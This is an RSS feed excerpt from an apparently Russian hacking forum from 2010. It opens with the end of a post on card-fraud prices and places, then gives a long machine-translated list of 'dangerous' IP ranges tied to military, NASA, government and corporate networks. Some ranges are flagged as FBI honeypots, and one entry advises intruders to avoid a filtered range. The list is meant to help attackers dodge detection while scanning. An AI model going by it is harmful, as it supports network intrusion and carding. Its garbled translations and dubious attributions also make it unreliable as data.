колеблются от10 центов до&lt;br /&gt;2-3 баксов в зависимости от карты и покупаемого количества.&lt;br /&gt;Столицей мирового кардинга является славный город Санкт Петербург,&lt;br /&gt;основными продавцами кредитных карт являются жители России и ближнего&lt;br /&gt;зарубежья, а жертвами в становятся жители США и Европы.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 18:23:01 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=26#p26</guid>
		</item>
		<item>
			<title>Опасные диопазоны IP адресов</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=25#p25</link>
			<description>&lt;p&gt;6.*.*.*: Центр Систем Информации Aarmy&lt;br /&gt;21.*.*.*: Американское Агентство Систем Информации Защиты&lt;br /&gt;22.*.*.*: Агентство Систем Информации Защиты&lt;br /&gt;24.8. * @Home, США&lt;br /&gt;24.88. [Roadrunner, США&lt;br /&gt;24.112. [@Home, Канада&lt;br /&gt;24.132. [A2000, Нидерланды&lt;br /&gt;24.188.*.*: Корпорация Систем Cablevisio (США)&lt;br /&gt;26.*.*.*: Агентство Систем Информации Защиты&lt;br /&gt;29.*.*.*: Агентство Систем Информации Защиты&lt;br /&gt;30.*.*.*: Агентство Систем Информации Защиты&lt;br /&gt;49.*.*.*: Соединить Тактическую Команду&lt;br /&gt;50.*.*.*: Соединить Тактическую Команду&lt;br /&gt;53.*.*.* DaimlerChrysler AG&lt;br /&gt;55.*.*.*: Армейское Бюро Национальной гвардии&lt;br /&gt;62.0.0.1 - 62.30.255.255&lt;br /&gt;62.52.*.*: Commundo&lt;br /&gt;62.52.*.*: Debitel&lt;br /&gt;62.62.*.*: lahm (9 французов Онлайн)&lt;br /&gt;62.69.140.*: AddCOM&lt;br /&gt;62.96.*.*: I-сеть&lt;br /&gt;62.137 * Freeserve, Великобритания&lt;br /&gt;62.150.*.*: еще раз 62.255.*.* T-Online&lt;br /&gt;62.156.*.*: Erotik-Велт&lt;br /&gt;62.157.*.*: 1 и 1&lt;br /&gt;62.158. [T-Online, Германия&lt;br /&gt;62.180.*.*: Селекторная связь Планеты&lt;br /&gt;64.9. * Adelphia, США&lt;br /&gt;64.44. * Дарвинское Сообщество(Община) Сетей, США&lt;br /&gt;64.224.*: (honeypot ФБР)&lt;br /&gt;64.225.*: (honeypot ФБР)&lt;br /&gt;64.226.*: (honeypot ФБР)&lt;br /&gt;80.*.*.*: lahm&lt;br /&gt;81.*.*.*: lahm&lt;br /&gt;128.4.0.0: Университет Делавэра&lt;br /&gt;128.8.0.0: Университет Штата Мэриленд&lt;br /&gt;128.10.0.0: Университет Purdue&lt;br /&gt;128.11.22.0 - 128.11.22.255: Yahoo, Inc.&lt;br /&gt;128.11.23.0 - 128.11.23.255: Yahoo, Inc.&lt;br /&gt;128.11.68.0 - 128.11.68.255: Yahoo, Inc (NETBLK-FOUR11DS559-68-19)&lt;br /&gt;128.11.69.0 - 128.11.69.255: Yahoo, Inc (NETBLK-FOUR11DS216-69-19)&lt;br /&gt;128.11.70.0 - 128.11.70.255: Yahoo, Inc (NETBLK-FOUR11DS698-70-19)&lt;br /&gt;128.11.71.0 - 128.11.71.255: Yahoo, Inc (NETBLK-FOUR11DS699-71-20)&lt;br /&gt;128.11.96.32 - 128.11.96.63: FortuneCity Ltd.&lt;br /&gt;128.36.0.0 Йельский Университет (ЧИСТАЯ ЙЕЛЬСКАЯ СЕТЬ)&lt;br /&gt;128.37.0.0: Армейский Yuma Доказательство Основания(Земли)&lt;br /&gt;128.38.0.0 Военно-морской Поверхностный Центр Войны (NET-NSWC-NET)&lt;br /&gt;128.39.0.0 Телекоммуникационная Администрация orwegian (СЕТЬ-NTANET)&lt;br /&gt;128.40.0.0 Университетский Колледж Лондон (NET-UCL-ETHERNET)&lt;br /&gt;128.41.0.0 Университетский Колледж Лондон (&amp;quot;чистое замкнутое обслуживание(служба) углеродистой стали&amp;quot;)&lt;br /&gt;128.42.0.0 Университет Риса (ЧИСТАЯ СЕТЬ РИСА)&lt;br /&gt;128.43.0.0 Защита Researc&lt;br /&gt;128.47.*.*: Армейская Команда Электроники Коммуникаций (СЕТЬ-TACTNET)&lt;br /&gt;128.50.*.*: Министерство обороны (ЧИСТЫЕ МОНЕТЫ)&lt;br /&gt;128.51.*.*: Министерство обороны (СЕТЬ-COINSTNET)&lt;br /&gt;128.56.*.*: Американское Военно-морское училище (NET-USNA-NET)&lt;br /&gt;128.63.*.*: Армейская Научно-исследовательская лаборатория Баллистики (ЧИСТАЯ ПОДСЕТЬ БАРРЕЛЯ)&lt;br /&gt;128.80.*.*: Армейская Команда Электроники Коммуникаций (CECOM) (СЕТЬ-CECOMNET)&lt;br /&gt;128.98.*.*: Оценка Защиты и Агентство Исследования (NET-DERA-UK)&lt;br /&gt;128.99.0.0 Northrop Grumman Корпорация - Лаборатория Наук Автоматизации (NET-NORTHROP-NET)&lt;br /&gt;128.100.0.0 Университет Вычисления(Вычислительной техники) Торонто и Коммуникаций (ЧИСТЫЙ ТОРОНТО)&lt;br /&gt;128.101.0.0 Университет Штата Миннесота (NET-UMN-NET)&lt;br /&gt;128.102.0.0: НАСА Исследовательский центр Ames&lt;br /&gt;128.103.0.0 Университет Гарварда (СЕТЬ-HARVA&lt;br /&gt;128.149.0.0: Штаб НАСА&lt;br /&gt;128.150.0.0 Национальный Фонд(Основа) Науки (NET-NSF-LAN)&lt;br /&gt;128.151.0.0 Университет Рочестера (ЧИСТАЯ СЕТЬ УРА)&lt;br /&gt;128.152.0.0 Электроника Hughes (СЕТЬ - ЦВК-ENET)&lt;br /&gt;128.153.0.0 Университет Clarkson (СЕТЬ-CLARKSON)&lt;br /&gt;128.154.*.*: НАСА Бьет Средство(Ссуду) Полета(Рейса) (NET-WFF-NET)&lt;br /&gt;128.155.*.*: Исследовательский центр Лэнгли НАСА (NET-LARC-NET)&lt;br /&gt;128.156.*.*: НАСА Центр Контроля(Управления) Льюиса Нетуорка (СЕТЬ - LERC)&lt;br /&gt;128.157.*.*: НАСА Космический центр Джонсона (NET-JSC-NET)&lt;br /&gt;128.158.*.*: НАСА Исследовательский центр Ames (NET-MSFC-NET)&lt;br /&gt;128.159.*.*: НАСА Исследовательский центр Ames (NET-KSC-NET)&lt;br /&gt;128.160.*.*: Военно-морская Научно-исследовательская лаборатория (СЕТЬ - SSCNET)&lt;br /&gt;128.161.*.*: НАСА Исследовательский центр Ames (NET-NSN-NET)&lt;br /&gt;128.183.*.*: НАСА Центр Полета(Рейса) Места(Космоса) Goddard (СЕТЬ-GSFC)&lt;br /&gt;128.190.0.0: Армия Belvoir Reasearch и Центр Развития&lt;br /&gt;128.216.*.*: Авиационная база ВВС MacDill (NET-CC-PRNET)&lt;br /&gt;128.217.*.*: НАСА Космический центр Kennedy (NET-NASA-KSC-OIS)&lt;br /&gt;128.236.*.*: Американская Академия Воздушных сил (NET-USAFA-NET&lt;br /&gt;129.11.0.0: Университет Лидса (ЧИСТЫЙ ЛИДС)&lt;br /&gt;129.12.0.0: Университет Кента в Кентербери (СЕТЬ-UKC)&lt;br /&gt;129.13.0.0: Университет Карлсруэ&lt;br /&gt;129.48.0.0: Авиационная база ВВС Мастера-Patterson&lt;br /&gt;129.50.0.0: НАСА Маршальский Космический Центр Полета(Рейса) (СЕТЬ-PSCN)&lt;br /&gt;129.51.0.0: Авиационная база ВВС Патрика (ЧИСТЫЙ НЕ УТОЧНЕНО) PAFB)&lt;br /&gt;129.52.0.0: Авиационная база ВВС Мастера-Patterson&lt;br /&gt;129.54.0.0: Авиационная база ВВС Vandenberg&lt;br /&gt;129.69.0.0: Университет Штутгарта (NET-NI-STG-NET)&lt;br /&gt;129.70.0.0: Университет Билефельда&lt;br /&gt;129.73.*.*: Siemens&lt;br /&gt;129.92.0.0: Институт Воздушных сил Технологии&lt;br /&gt;129.99.0.0: НАСА Исследовательский центр Ames&lt;br /&gt;129.139.0.0: Армейское Развитие Исследования Вооружения и Проектирующий Центр&lt;br /&gt;129.163.0.0: Космический центр NASA/Johnson (NET-NASA-JSCSSE)&lt;br /&gt;129.164.0.0: НАСА IVV (ЧИСТЫХ-E) НАСА-IVV)&lt;br /&gt;129.165.0.0: НАСА Центр Полета(Рейса) Места(Космоса) Goddard (NET-NASA-GSFCSSE)&lt;br /&gt;129.166.0.0: НАСА - Космический центр Джона Ф. Кеннеди (NET-NASA-JFKSSE)&lt;br /&gt;129.167.0.0: НАСА Маршальский Космический Центр Полета(Рейса) (NET-NASA-MSFCSSE)&lt;br /&gt;129.168.0.0: НАСА Исследовательский центр Льюиса (NET-NASA-LRCSSE)&lt;br /&gt;129.187.0.0: Leibniz-Rechenzentrum der Bayerischen Akademie&lt;br /&gt;129.198.0.0: Центр Летного испытания Воздушных сил&lt;br /&gt;129.209.0.0: Армейская Научно-исследовательская лаборатория Баллистики&lt;br /&gt;129.217.0.0: Университет Дортмунда&lt;br /&gt;129.229.0.0: Армия США Корпус Инженеров&lt;br /&gt;129.233.0.0: Fraunhofer Institut f&amp;#252;r Produktionstechnik u. Automatisierung&lt;br /&gt;129.251.0.0: Академия Воздушных сил Соединенных Штатов&lt;/p&gt;
						&lt;p&gt;130.40.0.0: НАСА Космический центр Джонсона&lt;br /&gt;130.75.0.0: Университет Ганновера&lt;br /&gt;130.112.0.0: Фонд(Основа) Исследования Энергии Нидерландов ECN&lt;br /&gt;130.114.0.0: Армейский Абердин, Доказывающий Установку Основания(Земли) Поддерживает Деятельность (СЕТЬ-APGNET)&lt;br /&gt;130.115.0.0: Университет Эрасмуса Роттердам&lt;br /&gt;130.123.0.0: Университет Massey&lt;br /&gt;130.133.0.0: Freie Universitaet Берлин&lt;/p&gt;
						&lt;p&gt;130.165.0.0: Корпус U.S.Army Инженеров&lt;br /&gt;130.167.0.0: Штаб НАСА&lt;br /&gt;130.183.0.0: Мех Max-Planck-Institut Plasmaphysik&lt;br /&gt;130.211.0.*: UUNet&lt;br /&gt;130.241.0.0: Университет Gothenburg (ЧИСТАЯ СЕТЬ ГАЗОБЕНЗИНОВОЙ УСТАНОВКИ)&lt;br /&gt;130.247.0.0: Самолет Вооруженных сил(Военных) Боинга&lt;br /&gt;131.3.0.0 - 131.3.255.255: Авиационная база ВВС Mather&lt;br /&gt;131.6.0.0: Авиационная база ВВС Лэнгли&lt;br /&gt;131.10.0.0: Авиационная база ВВС Barksdale&lt;br /&gt;131.17.0.0: Авиационная база ВВС Шеппарда&lt;br /&gt;131.21.0.0: Авиабаза Hahn (СЕТЬ-HAHNNET)&lt;br /&gt;131.22.0.0: Авиационная база ВВС Keesler&lt;br /&gt;131.25.0.0: Авиационная база ВВС Патрика&lt;br /&gt;131.35.0.0: Авиационная база ВВС Fairchild&lt;br /&gt;131.36.0.0: Авиабаза Yokota&lt;br /&gt;131.37.0.0: Авиационная база ВВС Elmendorf&lt;br /&gt;131.38.0.0: Авиационная база ВВС Hickam&lt;br /&gt;131.40.0.0: Авиационная база ВВС Bergstrom&lt;br /&gt;131.44.0.0: Авиационная база ВВС Рандолфа&lt;br /&gt;131.47.0.0: Авиационная база ВВС Andersen&lt;br /&gt;131.50.0.0: Авиационная база ВВС Дэвиса-Monthan&lt;br /&gt;131.54.0.0: Сеть Концентратора Воздушных сил&lt;br /&gt;131.61.0.0: Авиационная база ВВС McConnell&lt;br /&gt;131.62.0.0: Авиационная база ВВС Нортона&lt;br /&gt;131.92.0.0: Армейская Информационная Команда Систем - Абердин&lt;br /&gt;131.110.0.0: Средство(Ссуда) Собрания NASA/Michoud&lt;br /&gt;131.121.0.0: Военно-морское училище Соединенных Штатов&lt;br /&gt;131.122.0.0: Военно-морское училище Соединенных Штатов&lt;br /&gt;131.155. [Эйндховенский Университет, Нидерланды&lt;br /&gt;131.169.0.0: Deutsches Elektronen Синхротрон&lt;br /&gt;131.174. * Университет Неймегена, Нидерланды&lt;br /&gt;131.176.0.0: Европейский Космический Центр Операций(Действий)&lt;br /&gt;131.182.0.0: Штаб НАСА&lt;br /&gt;131.188.0.0: Университетский Erlangen Нюрнберг&lt;br /&gt;131.211.0.*: UUNet&lt;br /&gt;131.220.0.0: Университет Бонна&lt;br /&gt;131.236.0.0: Университетский Колледж, австралийская Академия Силы Защиты&lt;br /&gt;131.246.0.0: Университетский Кайзерслаутерн&lt;br /&gt;132.68. [Технологический Институт, Израиль&lt;br /&gt;132.95.0.0 - 132.108.0.0???&lt;br /&gt;134.2.0.0: Universitaet Tuebingen&lt;br /&gt;134.11.0.0: Пентагон (СЕТЬ-PENTNET)&lt;br /&gt;134.12.0.0: НАСА Исследовательский центр Ames&lt;br /&gt;134.21.0.0: Университет Фрибура&lt;br /&gt;134.78.0.0: Армейская Информационная Команда-ATCOM Систем&lt;br /&gt;134.80.0.0: Армейская Информационная Команда Систем&lt;br /&gt;134.91.*.*: Универ Дуйсбург&lt;br /&gt;134.95.*.*: Универ K&amp;#246;ln&lt;br /&gt;134.118.0.0: Космический центр NASA/Johnson&lt;br /&gt;134.147.0.0: Рур-Universitaet Бохум&lt;br /&gt;134.155.0.0: Университет Мангейма&lt;br /&gt;134.164.0.0: Армейская Станция Эксперимента Водных путей Инженера&lt;br /&gt;134.176.0.0: Universitaet Giessen&lt;br /&gt;134.194.0.0: Армия США Абердинский Испытательный Центр&lt;br /&gt;134.229.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;134.230.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;134.240.0.0: Американская военная Академия&lt;br /&gt;134.245.0.0: Universitaet Киль&lt;br /&gt;136.156.0.0: Европейский Центр Среднего диапазона Прогнозов погоды&lt;br /&gt;136.172.0.0: Deutsches Klimarechenzentrum&lt;br /&gt;136.178.0.0: Сеть Исследования НАСА&lt;br /&gt;136.199.0.0: Universitaet Трир&lt;br /&gt;137.1.0.0: Авиационная база ВВС Белого&lt;br /&gt;137.2.0.0: Авиационная база ВВС Джорджа&lt;br /&gt;137.3.0.0: Авиационная база ВВС Литл-Рока&lt;br /&gt;137.5.0.0: Сеть Концентратора Воздушных сил&lt;br /&gt;137.6.0.0: Сеть Концентратора Воздушных сил&lt;br /&gt;137.12.0.0: Сеть Концентратора Воздушных сил&lt;br /&gt;137.223.0.0: Siemens Системы Информации Nixdorf&lt;br /&gt;137.226.0.0: Ахенский Университет Технологии&lt;br /&gt;137.240.0.0: Команда Материальной части Воздушных сил&lt;br /&gt;137.242.0.0: Команда Логистики Воздушных сил&lt;br /&gt;137.250.0.0: Университет Аугсбурга (СЕТЬ-AUX)&lt;br /&gt;137.251.0.0: Fraunhofer-Institut f&amp;#252;r Arbeitswirtschaft und Организация&lt;br /&gt;138.13.0.0: Команда Систем Воздушных сил&lt;br /&gt;138.27.0.0: Армейская Информационная Команда Систем&lt;br /&gt;138.30.0.0: Национальное Космическое Агентство Развития Японии&lt;br /&gt;138.61.0.0: Майнц&lt;br /&gt;138.76.0.0: Штаб НАСА&lt;br /&gt;138.115.0.0: НАСА Информационная и Электронная Лаборатория Систем&lt;br /&gt;138.136.0.0 - 138.136.255.255: Морские Компьютеры и Телекоммуникационная Станция&lt;br /&gt;138.137.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;138.139.0.0: Аэродром Морской пехоты&lt;br /&gt;138.140.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;138.141.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;138.142.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;138.143.0.0: Морской Региональный Центр Автоматизации Данных&lt;br /&gt;138.156.0.0: Морская пехота Центральный Проект и Прогр Деятельность&lt;br /&gt;138.158.0.0: Морская пехота Центральный Проект и Прогр Деятельность&lt;br /&gt;138.168.0.0: Морская пехота Центральный Проект и Прогр Деятельность&lt;br /&gt;138.193.0.0: Ручей НАСА / Желтый Ручей&lt;br /&gt;139.2.0.0: Университет Дортмунда&lt;br /&gt;139.4.0.0: EUnet Deutschland GmbH&lt;br /&gt;139.5.0.0: Университет Дортмунда&lt;br /&gt;139.6.0.0: Fachhochschule K&amp;#246;ln&lt;br /&gt;139.7.0.0: Mannesmann Mobilfunk GmbH&lt;br /&gt;139.8.0.0: S and P Media GmbH&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.10.0.0 - 139.16.0.0: Университет дортмундских (NETBLK-UNIDO11)&lt;br /&gt;139.11.0.0: Universit&amp;#228;t der Бундесвер Гамбург&lt;br /&gt;139.13.0.0: Fachhochschule Вильгельмсхафен&lt;br /&gt;139.14.0.0: Кобленцский ландо Universit&amp;#228;t&lt;br /&gt;139.15.0.0 - 139.15.255.255: Robert Bosch GmbH&lt;br /&gt;139.17.0.0: Geo-Forschungs-Zentrum Потсдам&lt;br /&gt;139.18.0.0: Universit&amp;#228;t Лейпциг (NET-UNILE-LAN)&lt;br /&gt;139.19.0.0: Max-Planck-Institut f&amp;#252;r Informatik&lt;br /&gt;139.20.0.0 - 139.20.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;139.20.0.0 - 139.29.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;139.21.0.0: Услуги Бизнеса Siemens&lt;br /&gt;139.22.0.0: Услуги Бизнеса Siemens&lt;br /&gt;139.23.0.0: Услуги Бизнеса Siemens&lt;br /&gt;139.25.0.0: Услуги Бизнеса Siemens&lt;br /&gt;139.27.0.0 - 139.27.255.255: Thyssen Stahl AG&lt;br /&gt;139.28.0.0: Bremer Vulkan AG&lt;br /&gt;139.30.0.0: Университет Ростока&lt;br /&gt;139.75.0.0: Альфред Ведженер Назначает для Полярного и Морского Исследования&lt;br /&gt;139.88.0.0: НАСА Исследовательский центр Льюиса&lt;br /&gt;139.142.*.*: Передняя дверь конца сети безопасности, фильтрующей сотни ДЮЙМА В СЕКУНДУ подписки клиента. Если Вы находите уязвимый паб, IIS, SQL, или *nix - ОСТАВЛЯЮТ IT в покое&lt;br /&gt;139.161.0.0: Армейская Информационная Команда Систем&lt;br /&gt;139.169.0.0: Космический центр NASA/Johnson&lt;br /&gt;139.229.0.0: НАСА Исследовательский центр Ames&lt;br /&gt;140.139.0.0: ШТАБ - КВАРТИРА американская Армейская Медицинская Научно-исследовательская Команда&lt;br /&gt;140.239.81.184 - 140.239.81.191: Морская Биологическая Лаборатория&lt;br /&gt;141.0.0.0 - 141.255.255.255: Быстро nur Немецкий Firmen&lt;br /&gt;144.99.0.0 Армейская Информационная Команда Систем Соединенных Штатов (NET-CRLSLBKS-NET)&lt;br /&gt;144.109.0.0 Армейская Информационная Команда Систем (СЕТЬ-NCMBRLNDNET)&lt;br /&gt;144.143.0.0 Штаб, Третья Армия Соединенных Штатов (СЕТЬ-AC2IS)&lt;br /&gt;144.144.0.0 Штаб, Третья Армия Соединенных Штатов (СЕТЬ-AC2IS1)&lt;br /&gt;144.146.0.0 Командующий, Армейский Информационный Центр Систем (СЕТЬ-FTIRWIN1)&lt;br /&gt;144.147.0.0 Командующий, Армейский Информационный Центр Систем (СЕТЬ-FTIRWIN2)&lt;br /&gt;144.192.0.0 Армейская Информационная Команда-Campbell Услуг Соединенных Штатов (NET-CAMPBELL-GW1)&lt;br /&gt;144.232. * Sprintlink, США&lt;br /&gt;144.233.0.0 Спецслужба Защиты (СЕТЬ-DODIIS1)&lt;br /&gt;144.234.0.0 Спецслужба Защиты (СЕТЬ-DODIIS2)&lt;br /&gt;144.235.0.0 Спецслужба Защиты (СЕТЬ-DODIIS3)&lt;br /&gt;144.236.0.0 Спецслужба Защиты (СЕТЬ-DODIIS4)&lt;br /&gt;144.237.0.0 Спецслужба Защиты (СЕТЬ-DODIIS5)&lt;br /&gt;144.238.0.0 Спецслужба Защиты (СЕТЬ-DODIIS6)&lt;br /&gt;144.239.0.0 Спецслужба Защиты (СЕТЬ-DODIIS7)&lt;br /&gt;144.240.0.0 Спецслужба Защиты (СЕТЬ-DODIIS&lt;br /&gt;144.241.0.0 Спецслужба Защиты (СЕТЬ-DODIIS9)&lt;br /&gt;144.242.0.0 Спецслужба Защиты (СЕТЬ-DODIIS10)&lt;br /&gt;144.247.0.0 SUPSHIP, Groton, U.S.N. (СЕТЬ-SOSGNET)&lt;br /&gt;144.249.0.0 Воздушные Продукты и Химикалии, Объединенные (NET-APCI-NET)&lt;br /&gt;144.252.0.0 Армия США LABCOM (NET-LABCOM-ETDL)&lt;br /&gt;145.0.0.0 - 145.255.255.255: Niederlande, Frankreich und Deutschland&lt;br /&gt;147.103.0.0: Армейский Информационный Центр Программного обеспечения Систем&lt;br /&gt;147.104.0.0: Армейский Информационный Центр Программного обеспечения Систем&lt;br /&gt;147.164.0.0: Армейская Информационная Команда Систем&lt;br /&gt;147.165.0.0: Армейская Информационная Команда Систем&lt;br /&gt;147.198.0.0: Армейская Информационная Команда Систем&lt;br /&gt;147.199.0.0: Армейская Информационная Команда Систем&lt;br /&gt;147.238.0.0: Армейская Информационная Команда Систем&lt;br /&gt;147.240.0.0: Американская Армейская Автомобильная резервуаром(танком) Команда&lt;br /&gt;147.251. [ContacTel, Чешская республика&lt;br /&gt;149.201.0.0: Fachhochschule Ахен (ЧИСТАЯ ЛВС ЦВК)&lt;br /&gt;149.202.0.0 - 149.202.255.255: Siemens Никсдорф Информэйшнссистем АГ&lt;br /&gt;149.202.0.0 - 149.204.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;149.203.0.0 - 149.203.255.255: Medizinische Akademie Магдебург&lt;br /&gt;149.204.0.0 - 149.204.255.255: Alcanet International Deutschland GmbH&lt;br /&gt;149.205.0.0: Пожарный гидрант Merseburg&lt;br /&gt;149.206.0.0 - 149.206.255.255: Thyssen Stahl AG&lt;br /&gt;149.206.0.0 - 149.251.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;149.207.0.0: Telefunken Systemtechnik Ульм&lt;br /&gt;149.211.0.0 - 149.211.255.255: Thyssen Stahl AG&lt;br /&gt;149.212.0.0: Siemens-Nixdorf Информэйшнссистемер А/с&lt;br /&gt;149.216.0.0 - 149.216.255.255: Degussa AG&lt;br /&gt;149.217.0.0: Max-Planck-Institut f&amp;#252;r Kernphysik&lt;br /&gt;149.218.0.0: Hirschmann and Co&lt;br /&gt;149.219.0.0: Вестдеучер Рандфанк Коелн&lt;br /&gt;149.220.0.0: Forschungszentrum Rossendorf&lt;br /&gt;149.221.0.0: Rheinisch Bergische Presse-Data GmbH&lt;br /&gt;149.222.0.0 - 149.222.255.255: Fachhochschule Киль&lt;br /&gt;149.232.0.0 - 149.232.255.255: Quantum Software GmbH&lt;br /&gt;149.233.0.0: Lahmeyer International GmbH&lt;br /&gt;149.234.0.0 - 149.234.255.255: Schering AG Берлин&lt;br /&gt;149.235.0.0: iXOS Software GmbH&lt;br /&gt;149.236.0.0: Bruker Analytische Messtechnik GmbH&lt;br /&gt;149.237.0.0 - 149.237.255.255: Wiechers and Partner Datentechnik GmbH&lt;br /&gt;149.238.0.0 - 149.238.255.255: ZF Friedrichshafen AG&lt;br /&gt;149.239.0.0 - 149.239.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;149.240.0.0 - 149.240.255.255: Carl Schenk AG&lt;br /&gt;149.242.0.0 - 149.242.255.255: Koerber AG&lt;br /&gt;149.243.0.0: ЭРНО Раумфарттечник&lt;br /&gt;149.244.0.0: Knorr-Bremse AG, M&amp;#252;nchen&lt;br /&gt;149.246.0.0: Siemens АГ, OeN NKE A2&lt;br /&gt;149.248.0.0: TA Triumph-Adler AG&lt;br /&gt;149.250.0.0: Hoechst AG, Франкфурт&lt;br /&gt;149.251.0.0: Electricite de Франция - Исследование Этюдов Руководства(Направления)&lt;br /&gt;149.252.0.0: USDOE, НЕГОЛОСУЮЩИЕ Операции(Действия) Office&lt;br /&gt;149.253.0.0: DIRM/ITD&lt;br /&gt;149.254.0.0 - 149.254.255.255: Mercury Personal Communications, Ltd.&lt;br /&gt;149.99.130.*-149.99.150.*: Поставщик Kanadischer&lt;br /&gt;145.253.*.*: Arcor&lt;br /&gt;149.225.*.*: MSN&lt;br /&gt;150.144.0.0: НАСА Центр Полета(Рейса) Места(Космоса) Goodard&lt;br /&gt;150.149.0.0: Армейская Информационная Команда Систем&lt;br /&gt;150.197.0.0: Научно-исследовательский институт Космоса Кореи&lt;br /&gt;151.3.0.0 - 151.3.255.255 IUnet (NET-IUNET-BNET3)&lt;br /&gt;152.203.*.*: Compuserv&lt;br /&gt;152.166.*.*: AOL&lt;br /&gt;152.170.*.*: AOL&lt;br /&gt;152.172.*.*: AOL&lt;br /&gt;152.205.*.*: AOL&lt;br /&gt;152.207.*.*: AOL&lt;br /&gt;153.92.0.0: Deutsches Forschungsnetz&lt;br /&gt;153.93.0.0: Bundesanstalt f&amp;#252;r Wasserbau&lt;br /&gt;153.94.0.0: Transtec AG&lt;br /&gt;153.96.0.0: Fraunhofer Institut f&amp;#252;r Информация - und Datenverarbeitung IITB&lt;br /&gt;153.97.0.0: Fraunhofer Institut f&amp;#252;r Информация - und Datenverarbeitung IITB&lt;br /&gt;153.98.0.0: Евроконтроль(Евроуправление) Карлсруэ&lt;br /&gt;153.99.0.0 - 153.99.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;153.100.0.0: RWE Energie AG&lt;br /&gt;153.101.0.0 - 153.101.255.255: европейская Региональная интернет-РЕГИСТРАЦИЯ(РЕГИСТРАТУРА) / ЗРЕЛЫЙ NCC&lt;br /&gt;155.7.*.*: Американец Вызывает Информацию (NET-AFISHQ-NET1)&lt;br /&gt;155.8.*.*: Американский Гордон ArmyFort (NET-GORDON-NET5)&lt;br /&gt;155.9.*.*: Армейская Информационная Команда Систем Соединенных Штатов (NET-LWOOD-NET2)&lt;br /&gt;155.74.*.*: PEO STAMIS (СЕТЬ-CEAP2)&lt;br /&gt;155.75.*.*: Американский Армейский Корпус Инженеров (СЕТЬ-CEAP3)&lt;br /&gt;155.76.*.*: PEO STAMIS (СЕТЬ-CEAP4)&lt;br /&gt;155.77.*.*: PEO STAMIS (СЕТЬ-CEAP5)&lt;br /&gt;155.78.*.*: PEO STAMIS (СЕТЬ-CEAP6)&lt;br /&gt;155.79.*.*: Американский Армейский Корпус Инженеров (СЕТЬ-CEAP7)&lt;br /&gt;155.80.*.*: PEO STAMIS (СЕТЬ-CEAP&lt;br /&gt;155.81.*.*: PEO STAMIS (СЕТЬ-CEAP9)&lt;br /&gt;155.82.*.*: PEO STAMIS (СЕТЬ-CEAP10)&lt;br /&gt;155.83.*.*: Американский Армейский Корпус Enginers (СЕТЬ-CEAP11)&lt;br /&gt;155.84.*.*: PEO STAMIS (СЕТЬ-CEAP12)&lt;br /&gt;155.85.*.*: PEO STAMIS (СЕТЬ-CEAP13)&lt;br /&gt;155.86.*.*: Американский Армейский Корпус Инженеров (СЕТЬ-CEAP14)&lt;br /&gt;155.87.*.*: PEO STAMIS (СЕТЬ-CEAP15)&lt;br /&gt;155.88.*.*: PEO STAMIS (СЕТЬ-CEAP16)&lt;br /&gt;155.178.*.*: Федеральное управление авиации (ЧИСТОЕ FAA)&lt;br /&gt;155.213.*.*: Форт USAISC Benning (СЕТЬ-FTBENNNET3&lt;br /&gt;155.214.*.*: Директор Информационного Управления (NET-CARSON-TCACC)&lt;br /&gt;155.215.*.*: БАРАБАН USAISC-FT (NET-DRUM-TCACCIS)&lt;br /&gt;155.216.*.*: Руководство проектом TCACCIS Office (NET-FTDIX-TCACCI)&lt;br /&gt;155.217.*.*: Управление Информационного Управления (СЕТЬ - EUSTIS-EMH1)&lt;br /&gt;155.218.*.*: USAISC (NET-WVA-EMH2)&lt;br /&gt;155.219.*.*: Подоконник Форта DOIM/USAISC (NET-SILL-TCACCIS)&lt;br /&gt;155.220.*.*: USAISC-DOIM (NET-FTKNOX-NET4)&lt;br /&gt;155.221.*.*: Порядок USAISC-футов (NET-FTORD-NET2)&lt;br /&gt;156.*.*.*: Американские Суды, Siemens, государство Штата Миннесота&lt;br /&gt;158.3.0.0: Армия США TACOM&lt;br /&gt;158.8.0.0: Американский Армейский Центр Поддержки Солдата&lt;br /&gt;158.12.0.0: Американская Армия Лаборатории Гарри Диамонда&lt;br /&gt;159.1.0.0: Департамент Штата Вашингтон государства и Ind.&lt;br /&gt;159.206.0.0: Эр-Канада&lt;br /&gt;160.46.0.0: BMW AG, Берлинский завод&lt;br /&gt;160.47.0.0: BMW AG, завод Dingolfingen&lt;br /&gt;160.48.0.0: BMW AG, завод Landshut&lt;br /&gt;160.49.0.0: BMW AG, Мюнхенский завод&lt;br /&gt;160.50.0.0: BMW AG, Мюнхен исследует и admin. участки(сайты)&lt;br /&gt;160.51.0.0: BMW AG, Регенсбургский завод&lt;br /&gt;160.52.0.0: BMW AG, 